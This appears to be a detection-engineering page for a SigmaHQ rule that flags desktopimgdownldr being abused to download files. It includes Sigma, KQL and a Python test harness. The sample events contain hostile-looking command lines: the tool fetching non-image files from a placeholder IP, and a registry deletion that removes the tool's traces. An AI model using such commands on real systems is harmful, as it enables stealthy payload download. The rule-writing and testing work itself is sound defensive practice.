
Suspicious Desktopimgdownldr Command

Format: Sigma · Level: HIGH · Source: SigmaHQ · ATT&CK: T1105 · Sentinel table: imProcessCreate
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
Retrieved: 2026-05-07T23:00:00Z · Confidence: medium

Hunt Hypothesis

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

Detection Rule

Sigma (Original)

title: Suspicious Desktopimgdownldr Command
id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009
status: test
description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
references:
    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
    - https://twitter.com/SBousseaden/status/1278977301745741825
author: Florian Roth (Nextron Systems)
date: 2020-07-03
modified: 2021-11-27
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains: ' /lockscreenurl:'
    selection1_filter:
        CommandLine|contains:
            - '.jpg'
            - '.jpeg'
            - '.png'
    selection_reg:
        CommandLine|contains|all:
            - 'reg delete'
            - '\PersonalizationCSP'
    condition: ( selection1 and not selection1_filter ) or selection_reg
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high

KQL (Azure Sentinel)

imProcessCreate
| where (TargetProcessCommandLine contains " /lockscreenurl:"
         and not (TargetProcessCommandLine contains ".jpg"
                  or TargetProcessCommandLine contains ".jpeg"
                  or TargetProcessCommandLine contains ".png"))
    or (TargetProcessCommandLine contains "reg delete"
        and TargetProcessCommandLine contains "\\PersonalizationCSP")
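To show what the condition `( selection1 and not selection1_filter ) or selection_reg` actually fires on, the following Python reproduces the rule's matching logic and runs it over a handful of constructed process-creation events. This is an added example, not code from SigmaHQ or from this feed; the event dicts, hostnames, URLs and registry paths in it are made up for illustration, and the only assumption about the log schema is that each event carries a `CommandLine` string (as a Sysmon Event ID 1 or the Sentinel `imProcessCreate` row would).

```python
"""Reference implementation of the 'Suspicious Desktopimgdownldr Command'
Sigma condition, run over constructed sample events.
Added example; not part of the SigmaHQ rule or this feed page."""

# Sigma's 'contains' modifier is case-insensitive by default (and so is
# KQL 'contains'), so every comparison folds the command line to lower case.
LOCKSCREEN_TOKEN = " /lockscreenurl:"
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png")
REG_TOKENS = ("reg delete", "\\personalizationcsp")  # selection_reg, |all


def matches_rule(command_line: str) -> bool:
    """Return True when the command line satisfies
    ( selection1 and not selection1_filter ) or selection_reg."""
    cl = command_line.lower()
    selection1 = LOCKSCREEN_TOKEN in cl
    # The filter is a plain substring test over the whole command line,
    # exactly as in the Sigma/KQL, not a parse of the URL's file name.
    selection1_filter = any(ext in cl for ext in IMAGE_EXTENSIONS)
    selection_reg = all(tok in cl for tok in REG_TOKENS)
    return (selection1 and not selection1_filter) or selection_reg


def evaluate(events):
    """Run the rule over event dicts (assumed schema: a 'CommandLine' key,
    plus whatever else the source carries) and return the command lines
    that fired. The rule keys only on CommandLine; 'Image' is kept for
    context and is not consulted."""
    return [e["CommandLine"] for e in events if matches_rule(e["CommandLine"])]


# Constructed sample events. Hosts, URLs and registry paths are placeholders;
# for the registry case only the '\PersonalizationCSP' substring matters.
SAMPLE_EVENTS = [
    # 1. Expected benign: lock-screen image set via the documented parameter.
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:https://intranet.example/wallpaper.jpg /eventName:desktopimgdownldr"},
    # 2. Suspicious: the URL names something that is not an image.
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:http://203.0.113.10/update.zip /eventName:desktopimgdownldr"},
    # 3. Suspicious: removal of the PersonalizationCSP key the tool writes.
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f"},
    # 4. Unrelated: a reg delete against some other key.
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg delete HKCU\Software\Contoso\Temp /f"},
    # 5. Mixed case: still matches because matching is case-insensitive.
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "DesktopImgDownldr.exe /LockScreenUrl:http://203.0.113.10/a.dat /EventName:x"},
]


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print("ALERT:", hit)
    # Prints events 2, 3 and 5; events 1 and 4 stay quiet.
```

Running the block over the constructed events shows the two branches of the rule at work: the download branch fires only when `/lockscreenurl:` is present and no image extension appears anywhere on the command line, and the registry branch fires independently on `reg delete` plus `\PersonalizationCSP`. When tuning for your environment, remember that the extension filter is a substring check over the full command line, so it suppresses any event in which one of those three strings appears, wherever it appears.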

Required Data Sources

Sentinel Table: imProcessCreate
Notes: Ensure this data connector is enabled

False Positive Guidance

False positives depend on scripts and administrative tools used in the monitored environment (see the rule's falsepositives field above). Legitimate lock-screen configuration passes an image URL, which the rule's image-extension filter is meant to exclude.

MITRE ATT&CK Context

Tactic: Command and Control (attack.command-and-control)
Technique: T1105 Ingress Tool Transfer (attack.t1105)
References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml